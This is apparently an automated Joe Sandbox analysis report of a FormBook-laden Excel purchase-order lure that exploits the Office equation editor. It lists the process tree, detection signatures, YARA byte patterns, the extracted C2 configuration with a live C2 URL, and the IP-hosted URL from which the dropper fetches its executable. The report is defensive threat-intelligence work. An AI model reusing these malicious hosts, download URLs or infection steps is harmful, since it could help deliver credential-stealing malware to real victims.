Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
BON DE COMMANDE POUR CHENOUFI AEK.xlsx

Overview

General Information

Sample Name:BON DE COMMANDE POUR CHENOUFI AEK.xlsx
Analysis ID:626175
MD5:981661fb35d158853f012f21aadd7b92
SHA1:2ce93cbf7651c472a598b8756f5301275d95e27f
SHA256:3084b6d063c6ec61503e90e6f2c61830ec915593fed9ddc719f67bc1ec24b49a
Tags:VelvetSweatshopxlsx
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Injects a PE file into a foreign processes
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Shellcode detected
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Office equation editor establishes network connection
Drops PE files to the user root directory
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Contains functionality to download and execute PE files
Office Equation Editor has been started
Contains functionality to download and launch executables
Checks if the current process is being debugged
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2644 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 900 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2520 cmdline: "C:\Users\Public\vbc.exe" MD5: 5AF1C7DD89A535DEE51C3E28B4A74F8D)
      • bmexo.exe (PID: 1224 cmdline: C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\fmrfya MD5: FD42CBBC6D53AD34694C46731AABD852)
        • bmexo.exe (PID: 1820 cmdline: C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\fmrfya MD5: FD42CBBC6D53AD34694C46731AABD852)
          • explorer.exe (PID: 1860 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
            • chkdsk.exe (PID: 792 cmdline: C:\Windows\SysWOW64\chkdsk.exe MD5: A01E18A156825557A24A643A2547AA8C)
              • cmd.exe (PID: 2972 cmdline: /c del "C:\Users\user\AppData\Local\Temp\bmexo.exe" MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.freerenoadvice.com/ud5f/"], "decoy": ["makcoll.com", "mitrachocloud.com", "finikilspase.site", "vertriebmitherz.gmbh", "terapiasdelsinuips.com", "schoolmink.online", "slotgacor588.xyz", "zkf-lawyer.com", "daskocleaning.com", "baoxin-design.com", "hollywoodcuts.net", "animefnix.com", "trinityhomesolutionsok.com", "cfrhsw.xyz", "articrowd.com", "jlivingfurniture.com", "marmolsystem.com", "nudehack.com", "beam-birds.com", "cravensoft.com", "bjyunjian.com", "naturelleclub.com", "reece-family.net", "morarmail.com", "morgantownpet.supply", "recordanalytics.com", "factheat.online", "mcgillinvestigation.com", "tinyhouse.contact", "gpbrasilia.com", "jacobsclub.com", "theboemia.net", "balifoodfun.com", "alfonshotel.com", "spaceokara.com", "paraphras.com", "ruibaituobj.com", "rwbbrwe1.com", "turkishrepublik.com", "costumeshop.xyz", "minatexacess.com", "hathor-network.net", "02d1qp.xyz", "dadagrin.com", "lfsijin.com", "bupabii.site", "mydiga-angststoerung.com", "hayatseventeknoloji.com", "adv-cleaner.site", "ndsnus.com", "rebeccabarclaylpc.com", "eswpu.com", "babbleboat.com", "zvmsovsg.com", "quantumlab5.com", "venerems.com", "sh09.fyi", "maxpilesclinic.com", "luigilucioni.com", "yuttie.store", "tripnii.com", "topings33.com", "madetopraisehim.com", "tesladoge.info"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000000.977269250.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000006.00000000.977269250.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8c08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8fa2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x16345:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15df1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x16447:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x165bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x99ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1506c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa732:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b987:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ca8a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000006.00000000.977269250.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18809:$sqlite3step: 68 34 1C 7B E1
    • 0x1891c:$sqlite3step: 68 34 1C 7B E1
    • 0x18838:$sqlite3text: 68 38 2A 90 C5
    • 0x1895d:$sqlite3text: 68 38 2A 90 C5
    • 0x1884b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18973:$sqlite3blob: 68 53 D8 7F 8C
    00000008.00000002.1173044498.0000000000300000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000008.00000002.1173044498.0000000000300000.00000004.00000800.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8c08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8fa2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x16345:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15df1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x16447:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x165bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x99ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1506c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa732:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b987:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ca8a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 28 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      6.0.bmexo.exe.400000.7.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        6.0.bmexo.exe.400000.7.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8c08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8fa2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x16345:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15df1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x16447:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x165bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x99ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1506c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa732:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b987:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1ca8a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        6.0.bmexo.exe.400000.7.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18809:$sqlite3step: 68 34 1C 7B E1
        • 0x1891c:$sqlite3step: 68 34 1C 7B E1
        • 0x18838:$sqlite3text: 68 38 2A 90 C5
        • 0x1895d:$sqlite3text: 68 38 2A 90 C5
        • 0x1884b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18973:$sqlite3blob: 68 53 D8 7F 8C
        6.0.bmexo.exe.400000.7.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          6.0.bmexo.exe.400000.7.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x7e08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x81a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15545:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14ff1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15647:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x157bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x8bba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1426c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9932:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1ab87:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bc8a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 20 entries

          Sigma Signatures

          Exploits

          barindex
          Sigma detected: EQNEDT32.EXE connecting to internet
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 103.156.91.153, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 900, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49171
          Sigma detected: File Dropped By EQNEDT32EXE
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 900, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

          Snort Signatures

          No Snort rule has matched

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Found malware configuration
          Source: 00000006.00000000.977269250.0000000000400000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.freerenoadvice.com/ud5f/"], "decoy": ["makcoll.com", "mitrachocloud.com", "finikilspase.site", "vertriebmitherz.gmbh", "terapiasdelsinuips.com", "schoolmink.online", "slotgacor588.xyz", "zkf-lawyer.com", "daskocleaning.com", "baoxin-design.com", "hollywoodcuts.net", "animefnix.com", "trinityhomesolutionsok.com", "cfrhsw.xyz", "articrowd.com", "jlivingfurniture.com", "marmolsystem.com", "nudehack.com", "beam-birds.com", "cravensoft.com", "bjyunjian.com", "naturelleclub.com", "reece-family.net", "morarmail.com", "morgantownpet.supply", "recordanalytics.com", "factheat.online", "mcgillinvestigation.com", "tinyhouse.contact", "gpbrasilia.com", "jacobsclub.com", "theboemia.net", "balifoodfun.com", "alfonshotel.com", "spaceokara.com", "paraphras.com", "ruibaituobj.com", "rwbbrwe1.com", "turkishrepublik.com", "costumeshop.xyz", "minatexacess.com", "hathor-network.net", "02d1qp.xyz", "dadagrin.com", "lfsijin.com", "bupabii.site", "mydiga-angststoerung.com", "hayatseventeknoloji.com", "adv-cleaner.site", "ndsnus.com", "rebeccabarclaylpc.com", "eswpu.com", "babbleboat.com", "zvmsovsg.com", "quantumlab5.com", "venerems.com", "sh09.fyi", "maxpilesclinic.com", "luigilucioni.com", "yuttie.store", "tripnii.com", "topings33.com", "madetopraisehim.com", "tesladoge.info"]}
          Multi AV Scanner detection for submitted file
          Source: BON DE COMMANDE POUR CHENOUFI AEK.xlsxVirustotal: Detection: 38%Perma Link
          Source: BON DE COMMANDE POUR CHENOUFI AEK.xlsxReversingLabs: Detection: 26%
          Yara detected FormBook
          Source: Yara matchFile source: 6.0.bmexo.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.bmexo.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.bmexo.exe.170000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.bmexo.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.bmexo.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.bmexo.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.bmexo.exe.170000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.bmexo.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.bmexo.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000000.977269250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.1173044498.0000000000300000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.976211361.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.1007465925.000000000A9D3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.1172863395.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.979111122.0000000000170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1050132752.00000000000F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1050273447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.1020176757.000000000A9D3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1050307444.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.1172976610.0000000000200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Antivirus detection for URL or domain
          Source: http://103.156.91.153/fdcloudfiles/vbc.exeAvira URL Cloud: Label: malware
          Source: www.freerenoadvice.com/ud5f/Avira URL Cloud: Label: malware
          Multi AV Scanner detection for domain / URL
          Source: http://103.156.91.153/fdcloudfiles/vbc.exeVirustotal: Detection: 10%Perma Link
          Machine Learning detection for dropped file
          Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJoe Sandbox ML: detected
          Source: 6.0.bmexo.exe.400000.7.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 6.2.bmexo.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.2.bmexo.exe.170000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 6.0.bmexo.exe.400000.5.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 6.0.bmexo.exe.400000.9.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Exploits

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exeJump to behavior
          Office equation editor establishes network connection
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 103.156.91.153 Port: 80Jump to behavior
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: Binary string: C:\wxiwy\cojnmd\dyrz\70c437f178a447d5b5e03abf78ad86d5\khqwan\zzevlnko\Release\zzevlnko.pdb source: vbc.exe, 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmp, bmexo.exe, 00000005.00000002.979347417.0000000000F2E000.00000002.00000001.01000000.00000005.sdmp, bmexo.exe, 00000005.00000000.968231879.0000000000F2E000.00000002.00000001.01000000.00000005.sdmp, bmexo.exe, 00000006.00000000.974589862.0000000000F2E000.00000002.00000001.01000000.00000005.sdmp, chkdsk.exe, 00000008.00000002.1174039918.0000000002887000.00000004.10000000.00040000.00000000.sdmp, chkdsk.exe, 00000008.00000002.1173217045.00000000003B3000.00000004.00000020.00020000.00000000.sdmp, nsmD99.tmp.4.dr, bmexo.exe.4.dr
          Source: Binary string: chkdsk.pdb source: bmexo.exe, 00000006.00000002.1050114953.0000000000030000.00000040.10000000.00040000.00000000.sdmp, bmexo.exe, 00000006.00000002.1050401037.0000000000714000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: bmexo.exe, bmexo.exe, 00000006.00000003.981359909.0000000000800000.00000004.00000800.00020000.00000000.sdmp, bmexo.exe, 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, bmexo.exe, 00000006.00000003.979000602.00000000002B0000.00000004.00000800.00020000.00000000.sdmp, bmexo.exe, 00000006.00000002.1051582479.0000000000B10000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, chkdsk.exe, 00000008.00000002.1173724762.0000000002500000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000008.00000003.1050200391.0000000002090000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000008.00000003.1051411235.00000000021F0000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000008.00000002.1173489046.0000000002380000.00000040.00000800.00020000.00000000.sdmp
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00405D7A CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_00405D7A
          Source: C:\Users\Public\vbc.exeCode function: 4_2_004069A4 FindFirstFileW,FindClose,4_2_004069A4
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0040290B FindFirstFileW,4_2_0040290B

          Software Vulnerabilities

          barindex
          Shellcode detected
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035D056C ShellExecuteExW,ExitProcess,2_2_035D056C
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035D050B URLDownloadToFileW,ShellExecuteExW,ExitProcess,2_2_035D050B
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035D048A LoadLibraryW,URLDownloadToFileW,ShellExecuteExW,ExitProcess,2_2_035D048A
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035D0555 ShellExecuteExW,ExitProcess,2_2_035D0555
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035D03FE URLDownloadToFileW,ShellExecuteExW,ExitProcess,2_2_035D03FE
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035D03E5 ExitProcess,2_2_035D03E5
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035D041A URLDownloadToFileW,ShellExecuteExW,ExitProcess,2_2_035D041A
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035D058A ExitProcess,2_2_035D058A
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035D04A4 URLDownloadToFileW,ShellExecuteExW,ExitProcess,2_2_035D04A4
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 4x nop then pop edi6_2_0041730E
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 4x nop then pop ebx6_2_00406EA5
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4x nop then pop edi8_2_000A730E
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4x nop then pop ebx8_2_00096EA5
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 103.156.91.153:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 103.156.91.153:80

          Networking

          barindex
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.freerenoadvice.com/ud5f/
          Source: Joe Sandbox ViewASN Name: TWIDC-AS-APTWIDCLimitedHK TWIDC-AS-APTWIDCLimitedHK
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 13 May 2022 15:07:42 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Fri, 13 May 2022 06:57:17 GMTETag: "40667-5dedf2f5fd4c5"Accept-Ranges: bytesContent-Length: 263783Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a8 21 60 47 ec 40 0e 14 ec 40 0e 14 ec 40 0e 14 2f 4f 51 14 ee 40 0e 14 ec 40 0f 14 49 40 0e 14 2f 4f 53 14 e3 40 0e 14 b8 63 3e 14 e0 40 0e 14 2b 46 08 14 ed 40 0e 14 52 69 63 68 ec 40 0e 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 a9 9a 4f 61 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 68 00 00 00 12 3a 00 00 08 00 00 46 36 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 a0 3b 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 85 00 00 a0 00 00 00 00 90 3b 00 50 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 67 00 00 00 10 00 00 00 68 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9a 13 00 00 00 80 00 00 00 14 00 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b8 eb 39 00 00 a0 00 00 00 06 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 00 01 00 00 90 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 50 0a 00 00 00 90 3b 00 00 0c 00 00 00 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
          Source: global trafficHTTP traffic detected: GET /fdcloudfiles/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.156.91.153Connection: Keep-Alive
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035D050B URLDownloadToFileW,ShellExecuteExW,ExitProcess,2_2_035D050B
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
          Source: unknownTCP traffic detected without corresponding DNS query: 103.156.91.153
